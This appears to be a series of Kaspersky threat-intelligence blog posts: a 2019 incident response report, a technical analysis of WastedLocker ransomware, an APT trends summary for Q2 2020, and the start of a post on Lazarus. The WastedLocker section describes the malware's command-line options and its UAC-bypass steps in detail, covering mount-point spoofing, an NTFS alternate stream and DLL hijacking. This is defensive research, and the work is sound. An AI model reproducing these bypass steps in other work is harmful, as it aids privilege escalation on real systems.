Incident Response Analyst Report 2019

 Download full report (PDF)

As an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries’ cyber-incident tactics and techniques used in the wild. In this report, we share our teams’ conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.

The insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.

Executive summary

In 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.

Analysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.

Most of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware’s presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.

Verticals and industries

Adversaries used a variety of initial vectors to compromise victims’ environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. But the most common were exploitation of unpatched vulnerabilities, malicious emails, followed by brute-force attacks.

In addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.

Although we started working on incidents the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery varies between an average of one day in ransomware incidents to 10 days in cases of financial theft, up to 122 days in cyber-espionage and data-theft operations.

Recommendations

Based on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:

  • Apply complex password policies
  • Avoid management interfaces exposed to the internet
  • Only allow remote access for necessary external services with multi-factor authentication – with necessary privileges only
  • Regular system audits to identify vulnerable services and misconfigurations
  • Continually tune security tools to avoid false positives
  • Apply powerful audit policy with log retention period of at least six months
  • Monitor and investigate all alerts generated by security tools
  • Patch your publicly available services immediately
  • Enhance your email protection and employee awareness
  • Forbid use of PsExec to simplify security operations
  • Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks
  • Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss
  • Back up your data frequently and on separated infrastructure

 

Reasons for incident response

Significant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).

Organizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.

One of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story “Cities under ransomware siege“.

 

Distribution of reasons for top regions

A suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.

Distribution of reasons for industries

Although, different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).

Detection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.

Initial vectors or how adversaries get in

Common initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.

By linking the popular initial compromise vectors with how an incident was detected, we can see detected suspicious files were detected from malicious emails. And cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks.
Sometimes we act as complimentary experts for a primary incident response team from the victim’s organization and we have no information on all of their findings – hence the ‘Unknown reasons’ on the charts. Malicious emails are most likely to be detected by a variety of security toolstack, but that’s not showing distrubution of 0- to 1-day vulnerabilities.

The distribution of how long an attack went unnoticed and how an organization was compromised shows that cases that begin with vulnerability exploitation on an organization’s network perimeter went unnoticed for longest. Social enginnering attacks via email were the most short-lived.

Tools and exploits 30% of all incidents were tied to legitimate tools

In cyberattacks, adversaries use legitimate tools which can’t be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.

Most legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. PowerShell can be used virtually for any task.

Let’s weight those tools based on occurrence in incidents – we will also see tactics (MITRE ATT&CK) where they are usually applied.

Exploits

Most of the identified exploits in incident cases appeared in 2019 along with a well-known remote code execution vulnerability in Windows SMB service (MS17-010) being actively exploited by a large number of adversaries.

MS17-010 SMB service in Microsoft Windows
Remote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc. CVE-2019-0604 Microsoft Sharepoint
Remote code execution vulnerability allows adversaries to execute arbitrary code without authentication in Microsoft Sharepoint. CVE-2019-19781 Citrix Application Delivery Controller & Citrix Gateway
This vulnerability allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure. CVE-2019-0708 RDP service in Microsoft Windows
Remote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service. CVE-2018-7600 Drupal
Remote code execution vulnerability also known as Drupalgeddon2. Widely used in installation of backdoors, web miners and other malware on compromised web servers. CVE-2019-11510 Pulse Secure SSL VPN
Unauthenticated retrieval of VPN server user credentials. Instant access to victim organization through legitimate channel. Attack duration

For a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary’s activity and the end of the attack. As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.

Rush hours or days Average weeks Long-lasting months or longer This category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods.
In some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary’s activity. This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week. Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data.
Such attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group. Common threat:
Ransomware infection Common threat:
Financial theft Common threat:
Cyber-espionage and theft of confidential data Common attack vector:
  • Downloading of a malicious file by link in email
  • Downloading of a malicious file from infected site
  • Exploitation of vulnerabilities on network perimeter
  • Credentials brute-force attack
Common attack vector:
  • Downloading a malicious file by link in email
  • Exploitation of vulnerabilities on network perimeter
Common attack vector:
  • Exploitation of vulnerabilities on network perimeter
Attack duration (median):
1 day Attack duration (median):
10 days Attack duration (median):
122 days Incident response duration:
Hours to days Incident response duration:
Weeks Incident response duration:
Weeks Operational metrics False positives rate

False positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn’t have a specialist in threat hunting or they are managed by an external SOC that doesn’t have the full context for an event.

Age of attack

This is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.

How fast we responded

How long it took us to respond after an organization contacted us. 70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.

How long response took

Distribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.

MITRE ATT&CK tactics and techniques

Conclusion

In 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.

Improved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or start detections immediately after compromise.

Various tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.

Adversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.

Applying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.

2020. július 31.

WastedLocker: technical analysis

The use of crypto-ransomware in targeted attacks has become an ordinary occurrence lately: new incidents are being reported every month, sometimes even more often.

On July 23, Garmin, a major manufacturer of navigation equipment and smart devices, including smart watches and bracelets, experienced a massive service outage. As confirmed by an official statement later, the cause of the downtime was a cybersecurity incident involving data encryption. The situation was so dire that at the time of writing of this post (7/29) the operation of the affected online services had not been fully restored.

According to currently available information, the attack saw the threat actors use a targeted build of the trojan WastedLocker. An increase in the activity of this malware was noticed in the first half of this year.

We have performed technical analysis of a WastedLocker sample.

Command line arguments

It is worth noting that WastedLocker has a command line interface that allows it to process several arguments that control the way it operates.

 -p <directory-path>

Priority processing: the trojan will encrypt the specified directory first, and then add it to an internal exclusion list (to avoid processing it twice) and encrypt all the remaining directories on available drives.

 -f <directory-path>

Encrypt only the specified directory.

 -u username:password \\hostname

Encrypt files on the specified network resource using the provided credentials for authentication.

 -r

Launch the sequence of actions:

  1. Delete ;
  2. Copy to %WINDIR%\system32\<rand>.exe using a random substring from the list of subkeys of the registry key SYSTEM\CurrentControlSet\Control\;
  3. Create a service with a name chosen similarly to the method described above. If a service with this name already exists, append the prefix “Ms” (e.g. if the service “Power” already exists, the malware will create a new one with the name “MsPower”). The command line for the new service will be set to “%WINDIR%\system32\<rand>.exe -s”;
  4. Start this service and wait until it finishes working;
  5. Delete the service.

 -s:

Start the created service. It will lead to the encryption of any files the malware can find.

UAC bypass

Another interesting feature of WastedLocker is the chosen method of UAC bypass. When the trojan starts, it will check the integrity level it was run on. If this level is not high enough, the malware will try to silently elevate its privileges using a known bypass technique.

  1. Create a new directory in %appdata%; the directory name is chosen at random from the substrings found in the list of subkeys of the registry key SYSTEM\CurrentControlSet\Control\;
  2. Copy a random EXE or DLL file from the system directory to this new directory;
  3. Write the trojan’s own body into the alternate NTFS stream “:bin” of this system file;
  4. Create a new temporary directory and set its mount point to “C:\Windows ” (with a trailing whitespace) using the API function NtFsControlFile with the flag IO_REPARSE_TAG_MOUNT_POINT;
  5. Create a new subdirectory named “system32” inside the temporary directory. As a result of the previous step, this new subdirectory can be equally successfully addressed as “%temp%\<directory_name>\system32” or “C:\Windows \system32” (note the whitespace);
  6. Copy the legitimate winsat.exe and winmm.dll into this subdirectory;
  7. Patch winmm.dll: replace the entry point code with a short fragment of malicious code whose only purpose is to launch the content of the alternate NTFS stream created on step 2;
  8. Launch winsat.exe, which will trigger the loading of the patched winmm.dll as a result of DLL hijacking.

The above sequence of actions results in WastedLocker being relaunched from the alternate NTFS stream with elevated administrative privileges without displaying the UAC prompt.

Procmon log fragment during the launch of WastedLocker

Cryptographic scheme

To encrypt victims’ files, the developers of the trojan employed a combination of the AES and RSA algorithms that has already become a ‘classic’ among different crypto-ransomware families.

The search mask to choose which files will be encrypted, as well as the list of the ignored paths are set in the configuration of the malware.

Part of the trojan config showing the ignored path substrings

For each processed file, WastedLocker generates a unique 256 bit key and a 128 bit IV which will be used to encrypt the file content using the AES-256 algorithm in CBC mode. The implementation of the file operations is worthy of note, as it employs file mapping for data access. It must have been an attempt by the criminals to maximize the trojan’s performance and/or avoid detection by security solutions. Each encrypted file will get a new additional extension: “.garminwasted“.

The trojan also implements a way of integrity control as part of its file encryption routine. The malware calculates an MD5 hash of the original content of each processed file, and this hash may be utilized during decryption to ensure the correctness of the procedure.

WastedLocker uses a publicly available reference implementation of an RSA algorithm named “rsaref”.

The AES key, IV and the MD5 hash of the original content, as well as some auxiliary information, are encrypted with a public RSA key embedded in the trojan’s body. The sample under consideration contains a 4096 bit public RSA key.

The public RSA key format used by WastedLocker

It should be noted that this kind of cryptographic scheme, using one public RSA key for all victims of a given malware sample, could be considered a weakness if WastedLocker were to be mass-distributed. In this case a decryptor from one victim would have to contain the only private RSA key that would allow all the victims to decrypt their files.

However, as we can see, WastedLocker is used in attacks targeted at a specific organization which makes this decryption approach worthless in real-world scenarios.

The result of RSA encryption is Base64 encoded and saved in a new file with the extension .garminwasted_info, and what is notable, a new info file is created for each of the victim’s encrypted files. This is a rare approach that was previously used by the BitPaymer and DoppelPaymer trojans.

An example list of encrypted files from our test machine

Ransom note left by the trojan

Recommendations

This WastedLocker sample we analyzed is targeted and crafted specifically to be used in this particular attack. It uses a “classic” AES+RSA cryptographic scheme which is strong and properly implemented, and therefore the files encrypted by this sample cannot be decrypted without the threat actors’ private RSA key.

The Garmin incident is the next in a series of targeted attacks on large organizations involving crypto-ransomware. Unfortunately, there is no reason to believe that this trend will decline in the near future.

That is why it is crucial to follow a number of recommendations that may help prevent this type of attacks:

  1. Use up-to-date OS and application versions;
  2. Refrain from opening RDP access on the Internet unless necessary. Preferably, use VPN to secure remote access;
  3. Use modern endpoint security solutions, such as Kaspersky Endpoint Security for Business, that support behavior detection, automatic file rollback and a number of other technologies to protect from ransomware.
  4. Improve user education in the field of cybersecurity. Kaspersky Security Awareness offers computer-based training products that combine expertise in cybersecurity with best-practice educational techniques and technologies.
  5. Use a reliable data backup scheme.

Kaspersky products protect from this threat, detecting it as Trojan-Ransom.Win32.Wasted.d and PDM:Trojan.Win32.Generic. The relevant behavioral detection logic was added in 2017.

IoC

2cc4534b0dd0e1c8d5b89644274a10c1

2020. július 29.

APT trends report Q2 2020

For more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q2 2020.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact ‘intelreports@kaspersky.com‘.

The most remarkable findings

On May 11, the UK-based supercomputing center, ARCHER, announced that it would shut down access to its network while it investigated a security incident. The website stated that the “ARCHER facility is based around a Cray XC30 supercomputer (with 4920 nodes) that provides the central computational resource”. At the same time, the German-based bwHPC also announced a security incident and decided to restrict access to its resources. The Swiss National Supercomputing Centre, at the time involved in a project to study the small membrane protein of the coronavirus, confirmed that it, and other European high-performance computer facilities, had been attacked and that it had temporarily closed. On May 15, the EGI Computer Security and Incident Response Team (EGI-CSIRT) published an alert covering two incidents that, according to its report, may or may not be related. Both incidents describe the targeting of academic data centers for “CPU mining purposes”. The alert includes a number of IoCs, which complement other OSINT (open-source intelligence) observations. Although we weren’t able to establish with a high degree of certitude that the ARCHER hack and the incidents described by EGI-CSIRT are related, we suspect they might be. Some media speculated that all these attacks might be related to COVID-19 research being carried out at the supercomputing centers.

Interestingly, last July 16th 2020, NCSC published an advisory describing malicious activity targeting institutions related to research to find a vaccine for COVID-19. In this case, the malware used in the attacks belongs to a family called WellMess, as originally described by LAC Co back in 2018. Until recently, this malware was not believed to be related to any APT activity. Surprisingly, NCSC attributes this activity to the APT-29 threat actor. However, it does not provide any public proof.

From our own research, we can confirm that WellMess’s activity seems to follow a cycle, being used in campaigns every three months or so since its discovery. We observed a peak of activity in fall of 2019, followed by an increase in the number of C2s in February 2020. We also observed high-profile targeting, including telcos, government and contractors in MENA and the EU. However, from our side we cannot confirm attribution or targeting of health institutions at the moment.

For more details about WellMess, you can check our presentation from GReAT ideas here: https://youtu.be/xeTYLRCwnFo

Russian-speaking activity

In May, researchers at Leonardo published a report about “Penquin_x64”, a previously undocumented variant of Turla’s Penquin GNU/Linux backdoor. Kaspersky has publicly documented the Penquin family, tracing it back to its Unix ancestors in the Moonlight Maze operation of the 1990s. We followed up on this latest research by generating network probes that detect Penquin_x64 infected hosts at scale, allowing us to discover that tens of internet hoster’s servers in Europe and the US are still compromised today. We think it’s possible that, following public disclosure of Turla’s GNU/Linux tools, the Turla threat actor may have been repurposing Penquin to conduct operations other than traditional intelligence.

In June, we discovered two different domain names, “emro-who[.]in” and “emro-who[.]org”, typo-squatting the World Health Organization (WHO) Regional Office for the Eastern Mediterranean (EMRO). These domains, registered on June 21 using the Njalla.no registrar, seem to be used as sender domains for a spear-phishing campaign. This type of typo-squatting is reminiscent of Sofacy campaigns against other international organizations. Moreover, we have seen Njalla.no recently used to register SPLM and XTUNNEL C2 (command-and-control) servers and we have seen this autonomous system used by Sofacy in the past for a SPLM C2.

Hades is an elusive, highly dynamic threat actor that commonly engages in tailored hacking and special access operations, such as the OlympicDestroyer attack or the ExPetr (aka NotPetya) and Badrabbit attacks. On May 28, the US National Security Agency (NSA) published an alert detailing the use by Hades of an Exim vulnerability (CVE-2019-10149) for what appears to be a potentially large hacking operation designed for mass access. Our own report expanded on the scripts used in this operation, as well as providing other IoCs that we discovered.

Chinese-speaking activity

In late 2019, and again in March this year, we described ongoing malicious activities from a previously unknown threat actor that we named Holy Water. Holy Water notably leveraged a Go language and Google Drive-command-driven implant that we dubbed Godlike12. Following the publication of our report, and notifications to relevant incident response organizations, new Holy Water samples were submitted to VirusTotal. The newly discovered samples include Telegram-controlled and open-source-based Python implants that were probably deployed on the victim’s networks after a successful intrusion.

In March, one of our YARA rules from previous research on ShadowPad attacks detected a recently compiled executable file uploaded to VirusTotal. Later we found a few other samples from our own telemetry. ShadowPad is a modular attack platform consisting of a root module and various plugin modules responsible for diverse functionalities. ShadowPad was first discovered by Kaspersky in 2017. In August of that year, one of our customers detected suspicious network activities. After thorough investigation, we found a legitimate software module that had been compromised and backdoored by an advanced threat actor in a sophisticated software supply-chain attack. We notified the software vendor and also published the outcome of our investigations in a technical white paper. Since then, ShadowPad malware has been deployed in a number of major cyberattacks, with a different subset of plugins used in different attack cases: the CCleaner incident in 2017 and the ShadowHammer attacks in 2018 are the major examples of such attacks.

When analyzing new samples from ShadowPad malware, compiled and used in attacks since late 2019, our investigation revealed a strong connection between these recent ShadowPad malware samples and the CactusPete threat actor. CactusPete started deploying ShadowPad malware to a few victims at the beginning of 2019 through its HighProof backdoor. However, since late 2019, ShadowPad has been commonly used in CactusPete attacks.

This quarter, we described another CactusPete attack campaign which started in December 2019 In this campaign, the CactusPete threat actor used a new method to drop an updated version of the DoubleT backdoor onto the computers. The attackers implanted a new dropper module in the Microsoft Word Startup directory, most likely through a malicious document. This malicious dropper is responsible for dropping and executing a new version of the DoubleT backdoor, which utilizes a new method of encrypting the C2 server address.

While analysing compromised machines in Central Asia, we revealed an additional infection that was unrelated to the initial subject of our investigation. This led us to detect previously unknown malware that we dubbed B&W, which provides an attacker with the capabilities to remotely control a victim’s machine. Further analysis of the samples, infrastructure and other related artefacts allowed us to conclude, with medium confidence, that the newly found malware is related to the SixLittleMonkeys APT. This group is known to have been active for several years, targeting government entities in Central Asia.

HoneyMyte is an APT threat actor that we have been tracking for several years. In February, our fellow researchers at Avira blogged about HoneyMyte PlugX variants that they had recently observed targeting Hong Kong. PlugX has been used by multiple APT groups over the past decade, especially shared among Chinese-speaking threat actors, and has changed in many ways. Avira´s post covers the PlugX loader and backdoor payload, including its USB capabilities. In May, we published an update on this threat actor, specifically providing timely indicators to aid in threat hunting for some of the PlugX variants found in the wild between January and May this year.

In May, we discovered a watering hole on the website of a Southeast Asian top official. This watering hole, set up in March, seemed to leverage whitelisting and social engineering techniques to infect its targets. The final payload was a simple ZIP archive containing a readme file prompting the victim to execute a CobaltStrike implant. The mechanism used to execute CobaltStrike was DLL side-loading, which decrypted and executed a CobaltStrike stager shellcode. Analysis of the code, the infrastructure and the victimology led us to attribute this watering-hole, with high confidence, to the HoneyMyte APT threat actor.

Quarian is a little-known malicious program that Chinese-speaking actors have used since around 2012. We hadn’t spotted any further activity until we observed a resurgence in an attack by the Icefog group in 2019. We tracked the activity of the malware following this and noticed a new variant that was used during several attacks on Middle Eastern and African governments during 2020. In one case, we could see that this variant was deployed following exploitation of the CVE-2020-0688 vulnerability on the network of a government entity. This vulnerability, which was publicly reported in February 2020, allows an authenticated user to run commands as SYSTEM on a Microsoft Exchange server. In this case, the server was indeed compromised and was hosting the ChinaChopper webshell, which was used to obtain, and later launch, the Quarian and PlugX backdoors. Our analysis led us to assume, with medium to high confidence, that the group behind these attacks is one we track under the name CloudComputating – a Chinese-speaking actor that, based on previous reports, has targeted high-profile Middle Eastern diplomatic targets.

In March, researchers at Check Point Research published a report describing an APT campaign that targeted Mongolia’s public sector and leveraged a coronavirus-themed lure to conduct its initial intrusion. We were able to discover further samples and another COVID-themed document with the same targeting, as well as additional targets in Russia. We attribute this activity with medium confidence to IronHusky.

Middle East

The MuddyWater APT was discovered in 2017 and has been active in the Middle East ever since. In 2019, we reported activity against telecoms providers in Iraq and Iran, as well as government bodies in Lebanon. We recently discovered MuddyWater using a new C++ toolchain in a new wave of attacks in which the actor leveraged an open-source utility called Secure Socket Funneling for lateral movement.

At the end of May, we observed that Oilrig had included the DNSExfitrator tool in its toolset. It allows the threat actor to use the DNS over HTTPS (DoH) protocol. Use of the DNS protocol for malware communications is a technique that Oilrig has been using for a long time. The difference between DNS- and DoH-based requests is that, instead of plain text requests to port 53, they would use port 443 in encrypted packets. Oilrig added the publicly available DNSExfiltrator tool to its arsenal, which allows DoH queries to Google and Cloudflare services. This time, the operators decided to use subdomains of a COVID-related domain which are hardcoded in the DNSExfitrator detected samples.

Southеast Asia and Korean Peninsula

BlueNoroff is one of the most prolific financially motivated APT actors and we have published several reports of BlueNoroff campaigns targeting financial institutions. Recently, we uncovered another campaign that has been active since at least 2017. In this campaign, the group sends spear-phishing emails containing an archived Windows shortcut file. The file names are disguised as security or cryptocurrency related files in order to entice users into executing them. The infection chain started from this shortcut file is a complex multi-stage infection procedure. Before delivering the Windows executable payload, the actor uses two VBS and three PowerShell scripts in order to collect system information. The actor very carefully delivers the final payload only to the intended targets. The backdoor payload also utilizes a multi-stage infection procedure. The actor uses it to control infected hosts and implants additional malware for surveillance. These malicious programs are responsible for stealing the user’s keystrokes and saving a screenshot of the infected machine. The main targets of this campaign are financial institutions, such as cryptocurrency businesses, and fintech companies. We identified diverse victims from 10 countries, as well as more potential victims from open source intelligence.

The Lazarus group has been a major threat actor for several years. Alongside goals like cyber-espionage and cyber-sabotage, this threat actor has targeted banks and other financial companies around the globe. The group continues to be very active. We recently observed the Lazarus group attacking a software vendor in South Korea using Bookcode, malware that we evaluate to be a Manuscrypt variant, utilizing a watering-hole attack to deliver it. Manuscrypt is one of the Lazarus group’s tools that is actively being updated and used. The group attacked the same victim twice. Almost a year prior to compromising this victim, Lazarus attempted to infect it by masquerading as a well-known security tool, but failed. We were able to construct the group’s post-exploitation activity, identifying various freeware and red-teaming tools used. Although Lazarus has recently tended to focus more on targeting the financial industry, we believe that in this campaign they were seeking to exfiltrate intellectual property. We also observed that they previously spread Bookcode using a decoy document related to a company working in the defense sector. Based on our observations, we evaluate that the Bookcode malware is being used exclusively for cyber-espionage campaigns.

In April, we released an early warning about the VHD ransomware, which was first spotted in late March. This ransomware stood out because of its self-replication method. The use of a spreading utility compiled with victim-specific credentials was reminiscent of APT campaigns, but at the time we were unable to link the attack to an existing group. However, Kaspersky was able to identify an incident in which the VHD ransomware was deployed, in close conjunction with known Lazarus tools, against businesses in France and Asia. This indicates that Lazarus is behind the VHD ransomware campaigns that have been documented so far. As far as we know, this is also the first time it has been established that the Lazarus group has resorted to targeted ransomware attacks for financial gain.

Last year we created a private report on a malware framework that we named MATA, which we attribute, with low confidence, to the Lazarus group. This framework included several components, such as a loader, orchestrator and plug-ins. Initially, this framework targeted Windows and Linux. However, in April we discovered a suspicious macOS file uploaded to VirusTotal using a rule to detect the MATA malware framework. After looking into this malware, we confirmed that it was a macOS variant of the MATA malware. The malware developers Trojanized an open-source two-factor authentication application and utilized another open-source application template. While investigating, to find more solid evidence for attribution, we found an old Manuscrypt strain that used a similar configuration structure. We also discovered a cluster of C2 servers probably related to this campaign.

The MATA framework was not the only way that Lazarus targeted macOS. We also observed a cluster of activity linked to Operation AppleJeus. The other was similar to the macOS malware used in a campaign that we call TangDaiwbo. This is a multi-platform cryptocurrency exchange campaign: Lazarus utilizes macro-embedded Office documents and spreads PowerShell or macOS malware, depending on the victim’s system.

Early this year, we reported improvements in a Lazarus campaign targeting a cryptocurrency business. In this campaign, Lazarus adopted a downloader that sends compromised host information and selectively fetches the next-stage payload. Recently, we identified a Lazarus campaign with similar strategies, but targeting academic and automotive sectors. Lazarus also adopted new methods to deliver its tools. First of all, the group elaborated its weaponized document by adopting remote template injection techniques. Previously, Lazarus delivered macro-embedded documents to the victim, but the group has now applied one more stage to hinder detection. The group also utilized an open-source PDF reader named Sumatra PDF to make Trojanized applications. They created a Trojanized PDF reader, sending it to the victim with a crafted PDF file. If the victim opens this file, the Trojanised PDF viewer implants malicious files and shows decoy documents to deceive the victim. The actor delivers the final payload very carefully, and executes it in memory. Fortunately, we were able to get the final payload and confirm that it was a Manuscrypt variant that we had already described. We also found that it’s the same malware variant that the US CISA (Cybersecurity and Infrastructure Security Agency) recently reported, named COPPERHEDGE.

Following our report describing the long-standing PhantomLance campaign in Southeast Asia, we published a private report providing detailed attribution based on discovered overlaps with reported campaigns of the OceanLotus APT. In particular, we found multiple code similarities with the previous Android campaign, as well as similarities in macOS backdoors, infrastructure overlap with Windows backdoors and a couple of cross-platform resemblances. Based on our research, we believe, with medium confidence, that PhantomLance is a modern Android campaign conducted by OceanLotus. Apart from the attribution details, we described the actor’s spreading strategy using techniques to bypass app market filters. We also provided additional details about samples associated with previously reported suspected infrastructure, as well as the latest sample deployed in 2020 that uses Firebase to decrypt its payload.

Additionally, OceanLotus has been using new variants of its multi-stage loader since the second half of 2019. The new variants use target-specific information (username, hostname, etc.) of the targeted host that they obtained beforehand, in order to ensure their final implant is deployed on the right victim. The group continues to deploy its backdoor implant, as well as Cobalt Strike Beacon, configuring them with updated infrastructure.

Other interesting discoveries

The Deceptikons APT is a long-running espionage group believed to have been providing mercenary services for almost a decade now. The group is not technically sophisticated and has not, to our knowledge, deployed zero-day exploits. The Deceptikons infrastructure and malware set is clever, rather than technically advanced. It is also highly persistent and in many ways reminds us of WildNeutron. Deceptikon’s repeated targeting of commercial and non-governmental organizations is somewhat unusual for APT actors. In 2019, Deceptikons spear-phished a set of European law firms, deploying PowerShell scripts. As in previous campaigns, the actor used modified LNK files requiring user interaction to initially compromise systems and execute a PowerShell backdoor. In all likelihood, the group’s motivations included obtaining specific financial information, details of negotiations, and perhaps even evidence of the law firms’ clientele.

MagicScroll (aka AcidBox) is the name we’ve given to a sophisticated malware framework, whose main purpose is to decrypt and load an arbitrary payload in kernel mode. The framework consists of several stages. The first stage is a Windows security provider that is loaded by the system on boot and executed in user mode. This decrypts and runs a second payload, which is physically stored in the registry. Although we weren’t able to find a victim with this second stage, we were able to find a file that matches the expected format of the second stage. This second stage payload utilizes a well-known vulnerability in a VirtualBox driver (CVE-2008-3431) to load the third stage, which is designed to run in kernel mode. The kernel mode payload is decrypted from a resource from the second stage, using the key retrieved from the registry. Unfortunately, we couldn’t find a decryption key to decrypt the third stage payload, so we don’t know what the last part of this malware framework looks like. Although the code is quite sophisticated, we couldn’t identify any similarity with other known frameworks.

Aarogya Setu is the name of a mandatory COVID-19 mobile tracking app developed by the National Informatics Centre, an organization that comes under the Ministry of Electronics and Information Technology in India. It allows its users to connect to essential health services in India. With cyber criminals and APT actors taking advantage of pandemic-tracking applications to distribute Trojanized mobile apps, we investigated and identified apps that mimic the appearance and behavior of the legitimate Aarogya Setu app while deploying Android RATs. We consider one of these to be a new version of a RAT that we previously reported being used by the Transparent Tribe threat actor.

Final thoughts

The threat landscape isn’t always full of “groundbreaking” events.  However, a review of the activities of APT threat actors indicates that there are always interesting developments. Our regular quarterly reviews are intended to highlight these key developments.

Here are the main trends that we’ve seen in Q2 2020.

  • Geo-politics remains an important motive for some APT threat actors, as shown in the activities of MuddyWater, the compromise of the Middle East Eye website and the campaigns of CloudComputating and HoneyMyte groups.
  • As is clear from the activities of Lazarus and BlueNoroff, financial gain is another driver for some threat actors – including the use of ransomware attacks.
  • While Southeast Asia continues to be an active region for APT activities, this quarter we have also observed heavy activity by Chinese-speaking groups, including ShadowPad, HoneyMyte, CactusPete, CloudComputating and SixLittleMonkeys.
  • APT threat actors continue to exploit software vulnerabilities – examples this quarter include Hades and MagicScroll.
  • We have noted before that the use of mobile implants is no longer a novelty, and this quarter is no exception, as illustrated by the PhantomLance campaign.
  • It is clear that APT actors, like opportunistic cybercriminals, continue to exploit the COVID-19 pandemic as a theme to lure potential victims. However, we would note once again that this doesn’t represent a shift in TTPs.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

 

2020. július 28.

Lazarus on the hunt for big game

We may only be six months in, but there’s little doubt that 2020 will go down in history as a rather unpleasant year. In the field of cybersecurity, the collective hurt mostly crystallized around the increasing prevalence of targeted ransomware attacks. By investigating a number of these incidents and through discussions with some of our trusted industry partners, we feel that we now have a good grasp on how the ransomware ecosystem is structured.

Structure of the ransomware ecosystem

